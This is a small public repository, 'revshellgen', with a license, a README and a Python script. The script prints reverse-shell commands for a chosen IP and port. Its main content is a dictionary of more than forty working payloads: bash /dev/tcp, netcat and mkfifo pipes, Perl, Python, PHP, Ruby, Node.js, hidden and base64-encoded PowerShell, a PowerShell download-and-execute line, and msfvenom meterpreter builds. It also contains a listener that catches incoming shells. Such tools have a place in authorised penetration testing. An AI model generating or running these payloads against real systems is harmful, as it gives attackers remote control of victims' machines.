├── LICENSE ├── README.md └── revshellgen.py /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Cody Winkler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # revshellgen 2 | Simple script to generate commands to achieve reverse shells. Thanks to DevoOverkill9 for the great idea! 3 | 4 | ![Screenshot](https://user-images.githubusercontent.com/45709553/54481816-b75ff180-4807-11e9-84db-17aadd39799c.PNG) 5 | 6 | ## Usage 7 | 8 | ``` 9 | revshellgen.py [-h] [-i IPADDR] [-p PORT] [-t SHELL_TYPE] [-l] [-a] 10 | 11 | python revshellgen.py --help 12 | 13 | optional arguments: 14 | -h, --help show this help message and exit 15 | -i IPADDR, --ipaddr IPADDR 16 | IP address to connect back to 17 | -p PORT, --port PORT Port to connect back to 18 | -t SHELL_TYPE, --type SHELL_TYPE 19 | Type of reverse shell to generate 20 | -l, --list List available shell types 21 | -a, --all Generate all the shells! 22 | ``` 23 | 24 | ### Shell Types: 25 | 26 | - ASP: `asp` 27 | - AWK: `awk` 28 | - Bash: `bash`, `bash-2`, `bash-3` 29 | - Java: `java` 30 | - Java Server Page: `jsp` 31 | - Linux Binary: `lin-bin` 32 | - Lua: `lua` 33 | - Netcat (regular, mknod, & mkfifo variants): `nc`, `nc-c`, `nc-mkfifo`, `nc-mknod`, `nc-pipe`, `ncat` 34 | - Nodejs: `nodejs` 35 | - OSX Macho Binary: `osx-bin` 36 | - Perl: `perl`, `perl-2`, `perl-windows` 37 | - PHP: `php`, `php-2`, `php-3`, `php-4`, `php-5` 38 | - Powershell TCPClient: `ps-tcp`, 39 | - Powershell IEX: `ps-iex`, `ps-b64` 40 | - Python: `python`, `python-2` 41 | - Ruby: `ruby`, `ruby-2`, `ruby-windows` 42 | - Socat (preferred for interactive sessions): `socat` 43 | - Tclsh: `tclsh` 44 | - Telnet: `telnet`, `telnet-mkfifo` 45 | - War: `war` 46 | - Windows Binary: `win-bin` 47 | - Xterm: `xterm` 48 | 49 | ## Recommended Setup Steps 50 | 51 | For ease of use, it's recommended to add revshellgen to your path variable and give it executable permissions. 52 | 53 | ``` 54 | chmod +x /dir/to/revshellgen.py 55 | export PATH=$PATH:/dir/to/revshellgen 56 | ``` 57 | 58 | Alternatively, you can integrate it with other Kali tools by performing the following: 59 | 60 | ``` 61 | chmod +x /dir/to/revshellgen.py 62 | ln -s /dir/to/revshellgen.py /usr/bin/revshellgen 63 | ``` 64 | 65 | Keep in mind, this isn't ideal for systems with multiple users, and you should use root-privilege symbolic links with discretion. It's imperative that revshellgen.py is restricted from write access by untrusted users with this. 66 | 67 | **Another Example:** 68 | 69 | ![Screenshot](https://user-images.githubusercontent.com/45709553/54481815-b5962e00-4807-11e9-84a1-80c7901452c7.PNG) 70 | -------------------------------------------------------------------------------- /revshellgen.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | import socket 5 | import sys 6 | import time 7 | from base64 import b64encode 8 | 9 | def parse_options(): 10 | 11 | parser = argparse.ArgumentParser(description='python revshellgen.py -i 127.0.0.1 -p 1234 -t bash') 12 | parser.add_argument("-i", "--ipaddr", type=str, help="IP address to connect back to") 13 | parser.add_argument("-p", "--port", type=int, help="Port to connect back to") 14 | parser.add_argument("-t", "--type", type=str, help="Type of reverse shell to generate", dest='shell_type') 15 | parser.add_argument("-li", "--listen", action="store_true", help='Open a socket and listen for a shell') 16 | parser.add_argument("-ls", "--list", action="store_true", help="List available shell types", dest='shell_list') 17 | parser.add_argument("-a", "--all", action="store_true", help="Generate all the shells!", dest='all_shells') 18 | args = parser.parse_args() 19 | # Print help if there is absolutely nothing passed from CLI 20 | if args.all_shells == False and args.ipaddr == None and args.port == None and args.shell_list == False and args.shell_type == None: 21 | print(parser.print_help()) 22 | return args 23 | 24 | def main(args): 25 | 26 | if args.ipaddr or args.port != None: 27 | ipaddr = args.ipaddr 28 | port = args.port 29 | else: 30 | ipaddr = '127.0.0.1' 31 | port = 1234 32 | 33 | shells = { 34 | 'asp':'msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%d -f asp > revshell.asp' % (ipaddr, port), 35 | 'awk':'awk \'BEGIN {s = "/inet/tcp/0/%s/%d"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}\' /dev/null' % (ipaddr, port), 36 | 'bash':'bash -i >& /dev/tcp/%s/%d 0>&1' % (ipaddr, port), 37 | 'bash-2':'0<&196;exec 196<>/dev/tcp/%s/%d; bash <&196 >&196 2>&196' % (ipaddr, port), 38 | 'bash-3':'exec 5<> /dev/tcp/%s/%d; cat <&5 | while read line; do $line 2>&5>&5; done' % (ipaddr, port), 39 | 'java':'r = Runtime.getRuntime();p = r.exec(["/bin/sh","-c","exec 5<>/dev/tcp/%s/%d;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]);p.waitFor();' % (ipaddr, port), 40 | 'jsp':'msfvenom -p java/jsp_shell_reverse_tcp LHOST=%s LPORT=%d -f raw > revshell.jsp' % (ipaddr, port), 41 | 'lin-bin':'msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=%s LPORT=%d -f elf > revshell' % (ipaddr, port), 42 | 'lua':'lua5.1 -e \'local host,port = \"%s\",%d local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host,port); while true do local cmd,status,partial = tcp:receive() local f = io.popen(cmd,'r') local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()\'' % (ipaddr, port), 43 | 'nc':'nc -e /bin/sh %s %d' % (ipaddr, port), 44 | 'nc-c':'nc -c /bin/sh %s %d' % (ipaddr, port), 45 | 'nc-mkfifo':'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f' % (ipaddr, port), 46 | 'nc-mknod':'rm /tmp/l;mknod /tmp/l p;/bin/sh 0/tmp/l' % (ipaddr, port), 47 | 'nc-pipe':'/bin/sh | nc %s %d' % (ipaddr, port), 48 | 'ncat':'ncat %s %d -e /bin/sh' % (ipaddr, port), 49 | 'nodejs':'(function(){var net=require("net"),cp=require("child_process"),sh=cp.spawn("/bin/sh",[]);var client=new net.Socket();client.connect(%d,"%s",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();' % (port, ipaddr), 50 | 'osx-bin':'msfvenom -p osx/x86/shell_reverse_tcp LHOST=%s LPORT=%d -f macho > revshell.macho' % (ipaddr, port), 51 | 'perl':'perl -e \'use Socket;$i="%s";$p=%d;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'' % (ipaddr, port), 52 | 'perl-2':'perl -MIO -e \'$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"%s:%d");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\'' % (ipaddr, port), 53 | 'perl-windows':'perl -MIO -e \'$c=new IO::Socket::INET(PeerAddr,"%s:%d");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\'' % (ipaddr, port), 54 | 'php':'php -r \'$sock=fsockopen("%s",%d);exec("/bin/sh -i <&3 >&3 2>&3");\'' % (ipaddr, port), 55 | 'php-2':'php -r \'$s=fsockopen("%s",%d);shell_exec("/bin/sh -i <&3 >&3 2>&3");\'' % (ipaddr, port), 56 | 'php-3':'php -r \'$s=fsockopen("%s",%d);`/bin/sh -i <&3 >&3 2>&3`;\'' % (ipaddr, port), 57 | 'php-4':'php -r \'$s=fsockopen("%s",%d);system("/bin/sh -i <&3 >&3 2>&3");\'' % (ipaddr, port), 58 | 'php-5':'php -r \'$s=fsockopen("%s",%d);popen("/bin/sh -i <&3 >&3 2>&3", "r");\'' % (ipaddr, port), 59 | 'ps-tcp':'powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"%s\",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' % (ipaddr, port), 60 | 'ps-iex':'powershell IEX (New-Object Net.WebClient).DownloadString("http://%s:%d/revshell.ps1") \n\nMake a revshell.ps1 file and put it on your server!' % (ipaddr, port), 61 | 'ps-b64':'powershell -e '+ b64encode(('$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' % (ipaddr, port)).encode('utf16')[2:]).decode(), 62 | 'python':'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%d));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);\'' % (ipaddr, port), 63 | 'python-2':'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%d));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")\'' % (ipaddr, port), 64 | 'ruby':'ruby -rsocket -e\'f=TCPSocket.open(\"%s\",%d).to_i;exec sprintf(\"/bin/sh -i <&3 >&3 2>&3\",f,f,f)\'' % (ipaddr, port), 65 | 'ruby-2':'ruby -rsocket -e \'exit if fork;c=TCPSocket.new("%s","%d");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end\'' % (ipaddr, port), 66 | 'ruby-windows':'ruby -rsocket -e \'c=TCPSocket.new("%s","%d");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end\'' % (ipaddr, port), 67 | 'socat':'socat exec:\'bash -li\',pty,stderr,setsid,sigint,sane tcp:%s:%d \n\n[+] Catch incoming shell with:\n\nsocat file:`tty`,raw,echo=0 tcp-listen:%d' % (ipaddr, port, port), 68 | 'tclsh':'echo \'set s [socket %s %d];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;\' | tclsh' % (ipaddr, port), 69 | 'telnet':'rm -f /tmp/p; mknod /tmp/p p && telnet %s %d 0/tmp/p' % (ipaddr, port), 70 | 'telnet-mkfifo':'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet %s %d > /tmp/f' % (ipaddr, port), 71 | 'war':'msfvenom -p java/shell_reverse_tcp LHOST=%s LPORT=%d -f war -o revshell.war' % (ipaddr, port), 72 | 'win-bin':'msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%d -f exe > revshell.exe' % (ipaddr, port), 73 | 'xterm':'xterm -display %s:1 \n\n[+] Connect to your shell with:\n\nXnest :1 or xhost +targetip' % (ipaddr) 74 | } 75 | 76 | if args.shell_type: 77 | print("\n[+] Reverse shell command:\n") 78 | print(shells[args.shell_type]) 79 | 80 | if args.shell_list: 81 | print("\n[+] Available shell types:\n") 82 | print(shells.keys()) 83 | 84 | if args.all_shells: 85 | print("\n[+]Reverse shell commands:\n") 86 | for t,shell in shells.items(): 87 | print("{}\n".format(shell)) 88 | 89 | if args.listen: 90 | 91 | null = 'echo ""'.encode() 92 | print("\n[+] Listening.\n") 93 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 94 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 95 | s.bind(('0.0.0.0', args.port)) 96 | s.listen(5) 97 | conn, addr = s.accept() 98 | print("Connection from {}".format(addr)) 99 | while True: 100 | data = conn.recv(1024).decode() 101 | if not data: 102 | break 103 | sys.stdout.write(str(data)) 104 | command = sys.stdin.readline() 105 | if 'exit' in command: 106 | conn.close() 107 | sys.exit() 108 | if 'clear' in command: 109 | conn.send(command.encode()) 110 | conn.send(null) 111 | if 'export' in command: 112 | conn.send(command.encode()) 113 | conn.send(null) 114 | conn.send(command.encode()) 115 | time.sleep(0.1) 116 | 117 | if __name__ == "__main__": 118 | 119 | args = parse_options() 120 | main(args) 121 | --------------------------------------------------------------------------------